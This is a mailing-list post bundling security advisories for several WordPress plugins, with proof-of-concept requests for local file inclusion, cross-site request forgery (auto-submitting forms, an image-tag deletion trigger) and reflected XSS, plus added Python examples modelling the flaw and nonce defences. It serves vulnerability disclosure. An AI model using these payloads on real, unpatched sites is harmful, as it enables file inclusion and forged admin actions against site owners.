Date: Mon, 15 Aug 2016 18:25:24 +0200
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities affecting eleven WordPress Plugins (XSS,
 CSRF, LFI & object injection)

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.




------------------------------------------------------------------------
Ajax Load More Local File Inclusion vulnerability
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Ajax Load More WordPress plugin is vulnerable
to Local File Inclusion. This issue can potentially be exploited to run
arbitrary PHP code. In order to do so, the attacker must be able to
place an arbitrary PHP file on the target system. The malicious file
must have the .php extension.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0034

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Ajax Load More - Infinite
Scroll [2] WordPress Plugin version 2.11.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in version 2.11.2 [3].

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The user-supplied $_GET['repeater'] value is concatenated, unsanitised,
into the path that is handed to include():

$include = ALM_REPEATER_PATH . 'repeaters/'. $template .'.php';

This results in Local File Inclusion. To reach that line, $type must
equal 'repeater'. alm_get_repeater_type() derives $type by splitting
$repeater at the first digit and keeping the part before it, so the
payload has to start with 'repeater' followed by a digit; everything
after the digit, including '../' sequences, stays in $template and ends
up in the include path. The file_exists() check that follows is the
only guard and does not stop traversal, because the file the attacker
points at does exist. Only files ending in .php can be included, since
the extension is appended. The request goes through admin-ajax.php and,
as the proof of concept below shows, needs neither a valid nonce nor a
login cookie.

repeater=repeater2f%2e%2e%2f../../../xmlrpc

After URL decoding this is 'repeater2f../../../../xmlrpc': the type is
'repeater', the 'repeater2f..' segment does not need to exist on disk
(the payload was tested successfully as is), and the remaining '../'
segments step back out of the repeaters directory. Their number depends
on where the plugin lives relative to the target file.

https://www.owasp.org/index.php/PHP_File_Inclusion
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

$repeater = (isset($_GET['repeater'])) ? $_GET['repeater'] : 'default'; // raw, unsanitised request value
$type = alm_get_repeater_type($repeater);

function alm_get_repeater_type($repeater){
	$type = preg_split('/(?=\d)/', $repeater, 2); // split $repeater value at the first digit to determine type
	$type = $type[0]; // default | repeater | template_
	return $type;
}

[..]

if($queryType === 'standard'){

[..]

	if($theme_repeater != 'null' && has_action('alm_get_theme_repeater')){
		do_action('alm_get_theme_repeater', $theme_repeater, $alm_found_posts, $alm_page, $alm_item, $alm_current); // Theme Repeater
	}else{
		include( alm_get_current_repeater($repeater, $type) ); // Include repeater template
	}

[..]

function alm_get_current_repeater($repeater, $type) {

	$template = $repeater; // still the raw request value
	$include = '';

	// If is Custom Repeaters (Custom Repeaters v1)
	if( $type == 'repeater' && has_action('alm_repeater_installed' )){
		$include = ALM_REPEATER_PATH . 'repeaters/'. $template .'.php'; // '../' in $template is carried through

		if(!file_exists($include)) // confirm file exists: the only check, and the return value is discarded
		   alm_get_default_repeater();

	}
	// If is Unlimited Repeaters (Custom Repeaters v2)
	elseif( $type == 'template_' && has_action('alm_unlimited_installed' )){
		global $wpdb;
		$blog_id = $wpdb->blogid;

		if($blog_id > 1){
			$include = ALM_UNLIMITED_PATH. 'repeaters/'. $blog_id .'/'.$template .'.php'; // same concatenation
		}else{
			$include = ALM_UNLIMITED_PATH. 'repeaters/'.$template .'.php';
		}

		if(!file_exists($include)) // confirm file exists
		   $include = alm_get_default_repeater();

	}
	// Default repeater
	else{
		$include = alm_get_default_repeater();
	}

	return $include;

}

The vulnerable branches are only reached when one of the paid add-ons
is installed, because of the has_action() checks: Custom Repeaters
(type 'repeater', alm_repeater_installed) or Unlimited Repeaters (type
'template_', alm_unlimited_installed). The Unlimited branch performs the
same unsanitised concatenation of $template.
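The following Python model is an added example, not code from the plugin or from the advisory. It ports the preg_split() type detection and the path concatenation so the reader can see which values reach the vulnerable branch and where the decoded proof-of-concept payload resolves, and it puts a hardened version next to it (an allow-list on the template name plus a containment check, a suggested approach rather than the vendor's actual fix). The install path ALM_REPEATER_PATH is hypothetical; the advisory does not state it.

```python
import os
import re

# Hypothetical install layout: the advisory does not state the real value of
# ALM_REPEATER_PATH, only that 'repeaters/' . $template . '.php' is appended to it.
ALM_REPEATER_PATH = "/srv/wp/wp-content/plugins/alm-repeaters/"
REPEATERS_DIR = os.path.normpath(os.path.join(ALM_REPEATER_PATH, "repeaters"))

# What PHP's $_GET['repeater'] holds for the advisory's payload
# repeater=repeater2f%2e%2e%2f../../../xmlrpc after URL decoding (%2e%2e%2f -> ../).
POC_REPEATER = "repeater2f../../../../xmlrpc"

SAFE_TEMPLATE = re.compile(r"[A-Za-z0-9_-]+")


def alm_get_repeater_type(repeater):
    """Port of the plugin's alm_get_repeater_type(): split at the first digit, keep the prefix."""
    return re.split(r"(?=\d)", repeater, maxsplit=1)[0]


def vulnerable_include_path(repeater):
    """Path the 2.11.1 code hands to include() in the Custom Repeaters (v1) branch.

    Mirrors the original: the raw value is concatenated, and the only guard is a
    file_exists() check that cannot tell a traversal target from a real repeater.
    Returns None when the branch is not reached (type is not 'repeater').
    """
    if alm_get_repeater_type(repeater) != "repeater":
        return None
    return ALM_REPEATER_PATH + "repeaters/" + repeater + ".php"


def resolved_include_path(repeater):
    """The vulnerable path after lexical '..' resolution, i.e. the file that would be opened."""
    path = vulnerable_include_path(repeater)
    return None if path is None else os.path.normpath(path)


def escapes_repeaters_dir(path):
    """True when the normalised path lies outside the repeaters directory."""
    normalised = os.path.normpath(path)
    return os.path.commonpath([REPEATERS_DIR, normalised]) != REPEATERS_DIR


def hardened_include_path(repeater):
    """Suggested check (not the vendor's fix): allow-list the name, then confirm containment."""
    if alm_get_repeater_type(repeater) != "repeater":
        return None
    if not SAFE_TEMPLATE.fullmatch(repeater):
        return None  # rejects '.', '/', '\\', NUL, '%' and anything else outside [A-Za-z0-9_-]
    path = os.path.normpath(os.path.join(REPEATERS_DIR, repeater + ".php"))
    if escapes_repeaters_dir(path):
        return None  # belt and braces; cannot trigger after the allow-list above
    return path


if __name__ == "__main__":
    for value in ("default", "repeater2", "../../../xmlrpc", POC_REPEATER):
        print(f"{value!r:34} type={alm_get_repeater_type(value)!r:18} "
              f"resolved={resolved_include_path(value)!r} hardened={hardened_include_path(value)!r}")
```

Running it shows why the digit is required: '../../../xmlrpc' on its own has type '../../../xmlrpc' and never reaches the include, while the proof-of-concept value has type 'repeater' and resolves, in this hypothetical layout, to a file outside the repeaters directory. The hardened function returns None for it and still accepts a legitimate name such as 'repeater2'.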

------------------------------------------------------------------------
Proof of Concept
------------------------------------------------------------------------
GET /html/wp-admin/admin-ajax.php?action=alm_query_posts&query_type=standard&nonce=&repeater=repeater2f%2e%2e%2f../../../xmlrpc&theme_repeater=null HTTP/1.1
Host: 192.168.50.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0)
Gecko/20100101 Firefox/47.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.50.9/html/
Cookie: 
Connection: close
Pragma: no-cache
Cache-Control: no-cache
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/ajax_load_more_local_file_inclusion_vulnerability.html
[2] https://wordpress.org/plugins/ajax-load-more/
[3] https://wordpress.org/plugins/ajax-load-more/changelog/
------------------------------------------------------------------------
Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows
adding of images
------------------------------------------------------------------------
Umit Aksu, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability was found in the Photo
Gallery by Supsystic WordPress Plugin. This issue can be used by an
attacker to add images to a gallery.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0001

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Photo Gallery by Supsystic [2]
WordPress Plugin version 1.8.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Photo Gallery by Supsystic version 1.8.6 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Photo Gallery by Supsystic [2] WordPress Plugin can be used to
create portfolios and image galleries. A Cross-Site Request Forgery
vulnerability was found in the Photo Gallery by Supsystic WordPress
Plugin. This issue can be used by an attacker to add images to a
gallery.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists because Photo Gallery lacks protection against
Cross-Site Request Forgery attacks. Due to this, it is possible to add
images to a gallery. In order to exploit this issue, the attacker has to
lure/force a victim into opening a malicious website/link.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form method="post" action="http://<target>/wp-admin/admin-ajax.php">
			<input type="hidden" name="action" value="grid-gallery">
			<input type="hidden" name="galleryId" value="5">
			<input type="hidden" name="attachType" value="gallery">
			<input type="hidden" name="folder_id" value="0">
			<input type="hidden" name="attachment_id" value="10">
			<input type="hidden" name="route[module]" value="photos">
			<input type="hidden" name="route[action]" value="add">
		</form>
		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_photo_gallery_wordpress_plugin_allows_adding_of_images.html
[2] https://wordpress.org/plugins/gallery-by-supsystic/
[3] https://downloads.wordpress.org/plugin/gallery-by-supsystic.zip
------------------------------------------------------------------------
Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows
deleting of galleries
------------------------------------------------------------------------
Umit Aksu, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability was found in the Photo
Gallery by Supsystic WordPress Plugin. This issue can be used by an
attacker to delete arbitrary galleries.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Photo Gallery by Supsystic [2]
WordPress Plugin version 1.8.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Photo Gallery by Supsystic version 1.8.6 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Photo Gallery by Supsystic [2] WordPress Plugin can be used to
create portfolios and image galleries. A Cross-Site Request Forgery
vulnerability was found in the Photo Gallery by Supsystic WordPress
Plugin. This issue can be used by an attacker to delete arbitrary
galleries.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists because Photo Gallery lacks protection against
Cross-Site Request Forgery attacks. Due to this, it is possible to
delete arbitrary galleries. Because the deletion is performed by a
plain GET request to admin.php, a single <img> tag is enough to trigger
it. In order to exploit this issue, the attacker has to lure/force a
victim into opening a malicious website/link.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<img src="http://<target>/wp-admin/admin.php?page=supsystic-gallery&module=galleries&action=delete&gallery_id=10">
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_photo_gallery_wordpress_plugin_allows_deleting_of_galleries.html
[2] https://wordpress.org/plugins/gallery-by-supsystic/
[3] https://downloads.wordpress.org/plugin/gallery-by-supsystic.zip
------------------------------------------------------------------------
Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows
deleting of images
------------------------------------------------------------------------
Umit Aksu, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability was found in the Photo
Gallery by Supsystic WordPress Plugin. This issue can be used by an
attacker to delete arbitrary images from the Photo Gallery.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Photo Gallery by Supsystic [2]
WordPress Plugin version 1.8.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Photo Gallery by Supsystic version 1.8.6 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Photo Gallery by Supsystic [2] WordPress Plugin can be used to
create portfolios and image galleries. A Cross-Site Request Forgery
vulnerability was found in the Photo Gallery by Supsystic WordPress
Plugin. This issue can be used by an attacker to delete arbitrary images
from the Photo Gallery.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists because Photo Gallery lacks protection against
Cross-Site Request Forgery attacks. Due to this, it is possible to
delete images from an existing gallery. In order to exploit this issue,
the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form method="post"
action="http://192.168.1.18/wp-admin/admin-ajax.php">
			<input type="hidden" name="action" value="grid-gallery">
			<input type="hidden" name="gallery_id" value="2">
			<input type="hidden" name="ids[]" value="5">
			<input type="hidden" name="ids[]" value="7">
			<input type="hidden" name="route[module]" value="galleries">
			<input type="hidden" name="route[action]" value="deleteResource">
		</form>
		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_photo_gallery_wordpress_plugin_allows_deleting_of_images.html
[2] https://wordpress.org/plugins/gallery-by-supsystic/
[3] https://downloads.wordpress.org/plugin/gallery-by-supsystic.zip
------------------------------------------------------------------------
Cross-Site Request Forgery vulnerability in Add From Server WordPress
Plugin
------------------------------------------------------------------------
Edwin Molenaar [2], July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that Add From Server is vulnerable to Cross-Site
Request Forgery. It can be exploited by luring the target user into
clicking a specially crafted link or visiting a malicious website (or
advertisement). An attacker can use this issue to add illegal content to
the victim's server, or to add very large files to the victim's server
to exhaust the available disk space.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160718-0004

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Add From Server [3] WordPress
Plugin version 6.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Add From Server version 3.3.2 [4].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Add From Server [3] WordPress Plugin is a quick plugin, which allows
you to import media & files into the WordPress uploads manager from
(remote) webservers. It was discovered that Add From Server is
vulnerable to Cross-Site Request Forgery. It can be exploited by luring
the target user into clicking a specially crafted link or visiting a
malicious website (or advertisement). Because of this, the following
attack scenarios are possible:

- Adding illegal content to the victim's server.
- Adding very large files to the victim's server to exhaust the
available disk space.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
When a (media) file is added from the server, the source is not
validated: the cwd parameter is used as-is, so files can be pulled not
only from the local filesystem but also from other hosts. The affected
code is not protected with an anti-Cross-Site Request Forgery token.

The function handle_imports() only removes slashes from the submitted
file names. The vulnerability exists in the file
add-from-server/class.add-from-server.php (line 213). Because slashes
are removed, the file that will be imported must sit in the root of the
source, for example www.example.com/largefile.txt.

The host is sent in the separate cwd parameter and the file name in
files[], so no slashes are needed in either.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
POST /wp-admin/upload.php?page=add-from-server HTTP/1.1
Host: <target>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
	
files%5B%5D=largefile.txt&import-date=current&cwd=www.example.com&import=Import
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_vulnerability_in_add_from_server_wordpress_plugin.html
[2] https://www.linkedin.com/in/edwinmolenaar
[3] https://wordpress.org/plugins/add-from-server/
[4] https://downloads.wordpress.org/plugin/add-from-server.3.3.2.zip
------------------------------------------------------------------------
Cross-Site Request Forgery vulnerability in Email Users WordPress Plugin
------------------------------------------------------------------------
Julien Rentrop, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was found that the Email Users WordPress Plugin is vulnerable to
Cross-Site Request Forgery. By using this issue it is possible for an
attacker to send arbitrary (bulk) email messages to any address. In
order to exploit this issue, an attacker needs to lure a target user
into clicking a specially crafted link or visiting a malicious website
(or advertisement).

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160718-0001

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Email Users [2] WordPress Plugin
version 4.8.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Email Users version 4.8.4 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Email Users [2] WordPress Plugin allows site editors to send an
e-mail to the blog users. It was found that the Email Users WordPress
Plugin is vulnerable to Cross-Site Request Forgery. By using this issue
it is possible for an attacker to send arbitrary (bulk) email messages
to any address.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The plugin's admin area has pages for:

- Send to individual user(s)
- Send to group of users
- Settings

All of these functions can be triggered through a CSRF attack: they are
executed when a logged-on admin user is lured into opening a page the
attacker controls. The option to send mail to groups of users is
especially interesting for an attacker. In order to exploit this issue,
an attacker needs to lure a target user into clicking a specially
crafted link or visiting a malicious website (or advertisement).

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
None of the requests below carries a WordPress nonce (or any other kind
of CSRF token), which is what makes the CSRF possible. The cookie values
shown should be replaced by those of a logged-on admin user when
reproducing; in a real attack the victim's browser supplies them. Most
unneeded headers/parameters have been stripped from the examples.

------------------------------------------------------------------------
Send to individual user(s)
------------------------------------------------------------------------
The example request is shown below. The attacker controls all fields,
including the body of the mail. To verify, check whether the response
contains "<p>Email sent to" followed by the number of users. User IDs
are sequential numbers, so an attacker can simply enumerate them; the
"%5B%5D" part is the URL-encoded form of [], so a list of user IDs can
be sent in a single request.

POST /wp-admin/admin.php?page=mailusers-send-to-user-page HTTP/1.1
Host: <target>
Content-Length: 157
Content-Type: application/x-www-form-urlencoded
Cookie:
wordpress_=wordpress%7C1468866087%7CkHiDEavVSFosPzEhZ8n073TzlG0EquiX7MWSZG5rdei%7Cc51c6bb8ebf70980d284f8a03ebe7d749dd4bb92caac78f8d46bd1e85eb593c9;
PHPSESSID=5240mh3f8gfdnn0r1hhbvinoh3;
Connection: close
	
send=true&fromName=wordpress&fromAddress=sumofpwn%40mailinator.com&mail_format=html&send_users%5B%5D=2&subject=test&mailcontent=test&Submit=Send+Email+%C2%BB

------------------------------------------------------------------------
Send to group of users
------------------------------------------------------------------------
See above. Here the send_targets param is used to send to the
role-subscriber users.

POST /wp-admin/admin.php?page=mailusers-send-to-group-page HTTP/1.1
Host: <target>
Content-Length: 257
Content-Type: application/x-www-form-urlencoded
Cookie:
wordpress_=wordpress%7C1468866087%7CkHiDEavVSFosPzEhZ8n073TzlG0EquiX7MWSZG5rdei%7Cc51c6bb8ebf70980d284f8a03ebe7d749dd4bb92caac78f8d46bd1e85eb593c9;
PHPSESSID=5240mh3f8gfdnn0r1hhbvinoh3;
Connection: close
	
send=true&fromName=other&fromAddress=other%40mail.com&group_mode=role&mail_format=html&send_targets%5B%5D=role-subscriber&subject=Subject+mail+to+all+subscribers&mailcontent=%3Cstrong%3EMessage+mail+to+all+subscribers%3C%2Fstrong%3E&Submit=Send+Email+%C2%BB

------------------------------------------------------------------------
Settings
------------------------------------------------------------------------
The following request turns off notifications for user ID 1; other
settings can be modified in the same way. Note that, unlike the previous
requests, this one is a GET instead of a POST.

GET /wp-admin/admin.php?page=mailusers-user-settings&action=notifications_off&user%5B%5D=1 HTTP/1.1
Host: <target>
Cookie:
wordpress_=wordpress%7C1468866087%7CkHiDEavVSFosPzEhZ8n073TzlG0EquiX7MWSZG5rdei%7Cc51c6bb8ebf70980d284f8a03ebe7d749dd4bb92caac78f8d46bd1e85eb593c9;
PHPSESSID=5240mh3f8gfdnn0r1hhbvinoh3;
Connection: close
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_vulnerability_in_email_users_wordpress_plugin.html
[2] https://wordpress.org/plugins/email-users/
[3] https://downloads.wordpress.org/plugin/email-users.4.8.4.zip
------------------------------------------------------------------------
Cross-Site Scripting/Cross-Site Request Forgery in Peter's Login
Redirect WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Peter's Login
Redirect WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In addition the
Plugin is vulnerable to Cross-Site Request Forgery, which allows an
attacker to change any setting of this plugin. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0028

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Peter's Login Redirect [2]
WordPress Plugin version 2.9.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Peter's Login Redirect version 2.9.1 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Peter's Login Redirect [2] WordPress Plugin redirects users to
different locations after logging in and logging out. A Cross-Site
Scripting vulnerability was found in the Peter's Login Redirect
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In addition the Plugin is
vulnerable to Cross-Site Request Forgery, which allows an attacker to
change any setting of this plugin.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists because Peter's Login Redirect lacks protection
against Cross-Site Request Forgery attacks. In addition, the plugin
lacks proper output encoding, rendering it vulnerable to Cross-Site
Scripting. See for example the following code fragment.

elseif( $rul_type == 'role' )
{
	$rul_rolevalues .= '<form name="rul_role_edit_form[' . $i_role . ']" action="?page=' . basename(__FILE__) . '" method="post">';
	$rul_rolevalues .= '<tr>';
	// $rul_value, $rul_url and $rul_url_logout are written into attribute values without esc_attr()
	$rul_rolevalues .= '<td><p><input type="hidden" name="rul_role" value="' . $rul_value . '" /> ' . $rul_value . '</p></td>';
	$rul_rolevalues .= '<td>';
	$rul_rolevalues .= '<p>' . __('Login URL', 'peters-login-redirect' ) . '<br /><input type="text" size="90" maxlength="500" name="rul_role_address" value="' . $rul_url . '" /></p>';
	$rul_rolevalues .= '<p>' . __('Logout URL', 'peters-login-redirect' ) . '<br /><input type="text" size="60" maxlength="500" name="rul_role_logout" value="' . $rul_url_logout . '" /></p>';
	$rul_rolevalues .= '</td>';
	$rul_rolevalues .= '<td><p><input name="rul_role_edit" type="submit" value="' . __( 'Edit', 'peters-login-redirect' ) . '" /> <input type="submit" name="rul_role_delete" value="' . __( 'Delete', 'peters-login-redirect' ) . '" /></p></td>';
	$rul_rolevalues .= '</tr>';
	$rul_rolevalues .= '</form>'; // no wp_nonce_field(): the form is not CSRF-protected

	$rul_roles_existing[$rul_value] = '';

	++$i_role;
}

In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=wplogin_redirect.php"
method="POST">
			<input type="hidden" name="rul&#95;role" value="administrator" />
			<input type="hidden" name="rul&#95;role&#95;address"
value="&quot;><script>alert(1);</script>" />
			<input type="hidden" name="rul&#95;role&#95;logout" value="" />
			<input type="hidden" name="rul&#95;role&#95;submit"
value="Add&#32;role&#32;rule" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
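The Photo Gallery, Add From Server, Email Users and Peter's Login Redirect advisories above all come down to the same missing control: a state-changing admin request is accepted on the strength of the session cookie alone, which is exactly what a cross-site form or <img> tag can make the victim's browser send. The Python model below is an added example, not code from any of these plugins or from WordPress itself. It shows the shape of the defence WordPress already provides (wp_create_nonce()/check_admin_referer()): an action-scoped, time-limited HMAC token that a foreign page cannot obtain because it is only embedded in same-origin admin pages. The secret, the clock value, the session token and the action name DELETE_ACTION are constructed for the example, and the gallery-delete handler is a stand-in for the plugin's real code.

```python
import hashlib
import hmac

# Stand-in for WordPress's NONCE_KEY/NONCE_SALT; constructed for this example.
NONCE_SECRET = b"replace-with-a-long-random-secret"
# WordPress nonces are valid for 12 to 24 hours: the tick counter advances every 12 hours.
NONCE_LIFE = 24 * 3600
DELETE_ACTION = "supsystic-gallery-delete"   # hypothetical action name for the example


def nonce_tick(now):
    """Same shape as wp_nonce_tick(): ceil(now / (life / 2))."""
    return -(-int(now) // (NONCE_LIFE // 2))


def _nonce_value(tick, action, user_id, session_token):
    # WordPress hashes "tick|action|uid|session token" with the nonce salt and keeps 10 chars.
    msg = f"{tick}|{action}|{user_id}|{session_token}".encode()
    return hmac.new(NONCE_SECRET, msg, hashlib.sha256).hexdigest()[-12:-2]


def create_nonce(action, user_id, session_token, now):
    return _nonce_value(nonce_tick(now), action, user_id, session_token)


def verify_nonce(nonce, action, user_id, session_token, now):
    """0 = invalid, 1 = issued in the current tick, 2 = issued in the previous tick."""
    tick = nonce_tick(now)
    for age, t in ((1, tick), (2, tick - 1)):
        expected = _nonce_value(t, action, user_id, session_token).encode()
        if hmac.compare_digest(expected, str(nonce).encode()):
            return age
    return 0


def delete_gallery_unprotected(request, galleries):
    """Vulnerable shape: only the cookie session is checked, so any site the admin
    visits can trigger the deletion (the <img> proof of concept above)."""
    galleries.pop(int(request["gallery_id"]), None)
    return "deleted"


def delete_gallery_protected(request, session, galleries, now):
    """Hardened shape: the equivalent of check_admin_referer(DELETE_ACTION) before acting.
    A capability check (current_user_can()) still belongs in front of this."""
    if not verify_nonce(request.get("_wpnonce", ""), DELETE_ACTION,
                        session["user_id"], session["token"], now):
        return "forbidden"   # WordPress would stop with "The link you followed has expired."
    galleries.pop(int(request["gallery_id"]), None)
    return "deleted"


def demo():
    """Runs the scenarios and returns the outcome of each one."""
    now = 1_471_278_324                                   # fixed clock (constructed)
    session = {"user_id": 1, "token": "c51c6bb8ebf70980"}  # logged-in admin (constructed)
    good = create_nonce(DELETE_ACTION, session["user_id"], session["token"], now)
    other = create_nonce("supsystic-gallery-add", session["user_id"], session["token"], now)
    results = {}
    galleries = {10: "holiday"}
    results["unprotected_cross_site"] = delete_gallery_unprotected({"gallery_id": "10"}, galleries)
    galleries = {10: "holiday"}
    results["no_nonce"] = delete_gallery_protected({"gallery_id": "10"}, session, galleries, now)
    results["wrong_action_nonce"] = delete_gallery_protected(
        {"gallery_id": "10", "_wpnonce": other}, session, galleries, now)
    results["expired_nonce"] = delete_gallery_protected(
        {"gallery_id": "10", "_wpnonce": good}, session, galleries, now + NONCE_LIFE + 1)
    results["previous_tick_nonce"] = verify_nonce(
        good, DELETE_ACTION, session["user_id"], session["token"], now + NONCE_LIFE // 2)
    results["valid_nonce"] = delete_gallery_protected(
        {"gallery_id": "10", "_wpnonce": good}, session, galleries, now)
    results["gallery_left"] = 10 in galleries
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:24} {outcome}")
```

demo() shows the contrast the advisories describe: the unprotected handler deletes on a bare request, while the protected one refuses a request with no nonce, a nonce minted for a different action, or a nonce older than the validity window, and accepts the genuine one. The nonce is tied to the user and session token as well, so a token leaked from one account is useless against another.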
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_cross_site_request_forgery_in_peter_s_login_redirect_wordpress_plugin.html
[2] https://wordpress.org/plugins/peters-login-redirect/
[3] https://downloads.wordpress.org/plugin/peters-login-redirect.zip
------------------------------------------------------------------------
Cross-Site Scripting in Link Library WordPress Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Reflected Cross-Site Scripting (XSS) vulnerability has been found in
the Link Library plugin. Using this vulnerability an attacker can inject
malicious JavaScript into the plugin's admin page, which executes in the
browser of a logged-in administrator who opens a crafted link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0016

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Link Library [2] version
5.9.12.29.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in version 5.9.12.30 [3].

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Cross-Site Scripting (XSS) attacks are a type of injection, in which
malicious scripts are injected into otherwise benign and trusted web
sites. XSS attacks occur when an attacker uses a web application to send
malicious code, generally in the form of a browser side script, to a
different end user. Flaws that allow these attacks to succeed are quite
widespread and occur anywhere a web application uses input from a user
within the output it generates without validating or encoding it.
Reflected XSS occurs when user input is immediately returned by a web
application in an error message, search result, or any other response
that includes some or all of the input provided by the user as part of
the request.

The "successimportcount" and "successupdatecount" query parameters are
echoed into the admin page without validation (they are never cast to
an integer) and without output encoding, so a double quote and a
<script> tag in either value land in the page verbatim.

/link-library/link-library-admin.php
885: echo "<div id='message' class='updated fade'><p><strong>" . (isset($_GET['successimportcount']) ? $_GET['successimportcount'] : '0') . " " . __('link(s) imported', 'link-library') . ", " . (isset($_GET['successupdatecount']) ? $_GET['successupdatecount'] : '0') . " " . __('link(s) updated', 'link-library') . ".</strong></p></div>";

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<targetsite>/wp-admin/admin.php?page=link-library-settingssets&messages=9&successimportcount=1" /><script>alert(1)</script>&currenttab=importexport

